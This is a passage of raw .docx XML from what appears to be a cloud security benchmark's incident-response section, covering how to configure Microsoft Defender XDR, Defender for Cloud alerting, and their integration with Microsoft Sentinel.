        <w:t>automated collection (T1119) conducting systematic data collection over extended periods when alert fatigue prevents detection of subtle anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E8BDF" w14:textId="77777777" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="00830ED5"/>
    <w:p w14:paraId="24CA269F" w14:textId="77777777" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="00830ED5"/>
    <w:p w14:paraId="5E759378" w14:textId="77777777" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="00830ED5"/>
    <w:p w14:paraId="2EE5B311" w14:textId="77777777" w:rsidR="00830ED5" w:rsidRDefault="00830ED5" w:rsidP="00830ED5"/>
    <w:p w14:paraId="74DFE4B8" w14:textId="681E849F" w:rsidR="00E41A4A" w:rsidRDefault="00EE733B" w:rsidP="00EE733B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-3.1: Configure Microsoft Defender XDR for unified threat detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60947EE1" w14:textId="77777777" w:rsidR="0086774E" w:rsidRDefault="0086774E" w:rsidP="00A25C2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Detect coordinated attacks through cross-platform signal correlation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1FC704" w14:textId="60FC0337" w:rsidR="0086774E" w:rsidRPr="0086774E" w:rsidRDefault="0086774E" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Implement Microsoft Defender XDR (Extended Detection and Response) as the primary unified security platform for comprehensive threat detection across Microsoft 365 workloads including endpoints, identities, email, and cloud applications. Defender XDR automatically correlates alerts from multiple sources into unified incidents for streamlined investigation and response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760AA24B" w14:textId="6D810BBE" w:rsidR="00EE733B" w:rsidRDefault="00EE733B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>Microsoft Defender XDR core capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF01B6B" w14:textId="4C98F91D" w:rsidR="00EE733B" w:rsidRDefault="00EE733B" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>Unified incident management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFE846F" w14:textId="3E6E0F61" w:rsidR="00EE733B" w:rsidRDefault="00EE733B" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>Automatic correlation of alerts across Microsoft Defender for Endpoint, Identity, Microsoft 365, and Cloud Apps into single incidents with complete attack story visualization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A515906" w14:textId="3BBD6663" w:rsidR="00EE733B" w:rsidRDefault="00EE733B" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>Automated Investigation and Response (AIR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCC5EDB" w14:textId="45A96FCD" w:rsidR="00EE733B" w:rsidRDefault="00EE733B" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>AI-powered automated investigation examining alerts and taking immediate remediation actions to resolve breaches with configurable automation levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1DCE05" w14:textId="02002048" w:rsidR="00EE733B" w:rsidRDefault="00EE733B" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>Advanced Hunting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32673B5A" w14:textId="3FF540EE" w:rsidR="00EE733B" w:rsidRDefault="00EE733B" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>Query-based threat hunting using Kusto Query Language (KQL) to proactively inspect up to 30 days of raw data across all Microsoft 365 security signals (Advanced Hunting).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372DEF00" w14:textId="4E37EE4E" w:rsidR="00EE733B" w:rsidRDefault="00EE733B" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>Cross-Product Signal Correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D6536D" w14:textId="46CC8782" w:rsidR="00EE733B" w:rsidRDefault="00EE733B" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>Real-time information sharing between Defender products to stop attack progression including automatic malicious file blocking across email, endpoints, and collaboration tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C4518" w14:textId="68830E74" w:rsidR="00EE733B" w:rsidRDefault="00EE733B" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>Attack disruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40791A4A" w14:textId="77777777" w:rsidR="0086774E" w:rsidRDefault="00EE733B" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE733B">
        <w:t>High-confidence automatic containment of active attacks at machine speed using signals from incident correlation and continuous Microsoft security research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05248159" w14:textId="232D5B71" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Threat detection and alert generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBBD8A3" w14:textId="492F5585" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Behavioral analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187943D4" w14:textId="5781BCE0" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t xml:space="preserve">Machine learning-powered detection of anomalous </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D34DC9">
        <w:t xml:space="preserve"> and device behavior patterns indicating compromise or insider threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2350BE8E" w14:textId="4895C624" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Threat Intelligence Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D270040" w14:textId="7E038E5F" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Automatic enrichment with Microsoft threat intelligence including known attacker infrastructure, malware signatures, and campaign attribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B64E8" w14:textId="48331F20" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:lastRenderedPageBreak/>
        <w:t>Custom Detection Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE103CD" w14:textId="50F4DC39" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Flexible detection rule creation using KQL queries for organization-specific threat patterns and business logic requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3A50B1" w14:textId="03762099" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Deception Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A894A12" w14:textId="3B6625EC" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Deployment of decoy assets detecting human-operated lateral movement in ransomware and business email compromise attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBF3C4A" w14:textId="71532EE0" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Real-time risk scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC43CBA" w14:textId="77777777" w:rsidR="0086774E" w:rsidRDefault="00D34DC9" w:rsidP="0007206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Dynamic risk assessment for users, devices, and sign-ins enabling risk-based access decisions through integration with Microsoft Entra Conditional Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD04B1D" w14:textId="2671360A" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Integration with Microsoft Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757663E4" w14:textId="15B1C164" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Unified SecOps platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BE37A4" w14:textId="37ABCE80" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Bi-directional integration enabling Microsoft Sentinel to ingest Defender XDR incidents and alerts while maintaining advanced SIEM and SOAR capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6497FBAE" w14:textId="407D424F" w:rsidR="0086774E" w:rsidRDefault="0086774E" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0086774E">
        <w:t>Microsoft Defender XDR Connector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EDBD17" w14:textId="1A910E58" w:rsidR="0086774E" w:rsidRDefault="0086774E" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0086774E">
        <w:t>Native connector synchronizing incidents, alerts, and advanced hunting data to Microsoft Sentinel for cross-platform correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E14B89" w14:textId="5063138A" w:rsidR="0086774E" w:rsidRDefault="0086774E" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0086774E">
        <w:t>Hybrid and Multi-Cloud Coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B1821" w14:textId="15C0DA7B" w:rsidR="0086774E" w:rsidRDefault="0086774E" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0086774E">
        <w:t>Extend detection capabilities beyond Microsoft 365 to Azure, on-premises, and third-party environments through Sentinel integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F679A8" w14:textId="45A00A24" w:rsidR="0086774E" w:rsidRDefault="0086774E" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0086774E">
        <w:t>Unified Incident Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E28BA" w14:textId="7AF740AD" w:rsidR="0086774E" w:rsidRDefault="0086774E" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0086774E">
        <w:t>Single pane of glass viewing and managing incidents from both Defender XDR and Sentinel with consistent investigation workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF2E48" w14:textId="16376BF0" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Cross-Platform Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F360381" w14:textId="03743D0C" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Correlation of Microsoft 365 threats with infrastructure security events, cloud workload alerts, and third-party security signals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3106CD37" w14:textId="722EE10F" w:rsidR="0086774E" w:rsidRDefault="00D34DC9" w:rsidP="0086774E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-3.2: Configure Microsoft Defender for Cloud advanced alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32070EF9" w14:textId="77777777" w:rsidR="0086774E" w:rsidRDefault="0086774E" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Optimize Azure infrastructure threat detection through advanced alerting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DF137D" w14:textId="58F8489F" w:rsidR="0086774E" w:rsidRPr="0086774E" w:rsidRDefault="0086774E" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Implement Microsoft Defender for Cloud with advanced alerting and proper tuning to generate high-quality security alerts for Azure infrastructure and workloads with minimal false positives. Defender for Cloud provides AI-powered threat detection across Azure resources with continuous learning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4297D" w14:textId="216E1955" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="219"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Advanced alerting configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F223A" w14:textId="699CD586" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Defender plan enablement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A16251" w14:textId="54EB0DE7" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Enable appropriate Defender plans including Defender for Servers, Defender for App Service, Defender for Storage, Defender for Containers, and Defender for Key Vault based on workload types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D361A7" w14:textId="7A354DC1" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:lastRenderedPageBreak/>
        <w:t>Threat Intelligence Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435685D1" w14:textId="09C7DB57" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Automatic correlation with Microsoft threat intelligence feeds, global attack signatures, and known malicious indicators for enhanced detection accuracy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6702DCED" w14:textId="0CFF4D5F" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Machine Learning Behavioral Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49436B87" w14:textId="6219594F" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>AI-powered behavioral analysis detecting anomalous activities such as unusual login patterns, privilege escalations, and data access anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E3B029" w14:textId="0CA91AA5" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Custom Alert Suppression Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657B339E" w14:textId="76F1F1E7" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Intelligent alert suppression for known false positives while maintaining coverage for genuine threats with regular review and validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1F9CBB" w14:textId="769FD077" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Alert Severity Calibration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175451B0" w14:textId="36A77180" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Proper alert severity assignment based on actual business impact, asset criticality, and threat intelligence confidence levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA9C09F" w14:textId="6F7F5ECD" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Integration with Defender XDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63903B11" w14:textId="77777777" w:rsidR="009607F6" w:rsidRDefault="00D34DC9" w:rsidP="00415218">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Automatic forwarding of Defender for Cloud alerts to Microsoft Defender XDR portal for unified incident correlation with Microsoft 365 security events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686045A9" w14:textId="1920238E" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="219"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Integration with Microsoft Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2AE707" w14:textId="170E657B" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Microsoft Sentinel data connector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC5482D" w14:textId="32BC06F6" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Native connector for streaming Defender for Cloud alerts to Microsoft Sentinel for advanced correlation and investigation capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF54D11" w14:textId="24C18497" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Alert Enrichment in Sentinel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B3E25A" w14:textId="51E0FEE7" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
